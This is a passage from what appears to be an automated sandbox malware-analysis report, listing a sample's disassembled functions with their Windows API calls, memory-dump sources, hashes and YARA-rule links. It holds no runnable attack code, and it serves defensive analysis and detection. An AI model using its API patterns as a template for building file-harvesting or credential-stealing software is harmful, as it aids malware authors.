                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                    • String ID:
                                                                    • API String ID: 1125800050-0
                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                    Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleSleep
                                                                    • String ID: }A
                                                                    • API String ID: 252777609-2138825249
                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                    Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • malloc.MSVCRT ref: 00409A10
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                    • free.MSVCRT ref: 00409A31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: freemallocmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3056473165-0
                                                                    • Opcode ID: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                    • Opcode Fuzzy Hash: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                    Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                    • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: BINARY
                                                                    • API String ID: 2221118986-907554435
                                                                    • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                    • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /stext
                                                                    • API String ID: 2081463915-3817206916
                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 2445788494-0
                                                                    • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                    • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                    Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID: failed to allocate %u bytes of memory
                                                                    • API String ID: 2803490479-1168259600
                                                                    • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                    • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset
                                                                    • String ID:
                                                                    • API String ID: 1065087418-0
                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                    Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                    • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                    • String ID:
                                                                    • API String ID: 1381354015-0
                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                    Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                    • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                    • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                    • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                    • String ID:
                                                                    • API String ID: 2154303073-0
                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3150196962-0
                                                                    • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                    • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 3154509469-0
                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                    • String ID:
                                                                    • API String ID: 4232544981-0
                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FileModuleName
                                                                    • String ID:
                                                                    • API String ID: 3859505661-0
                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
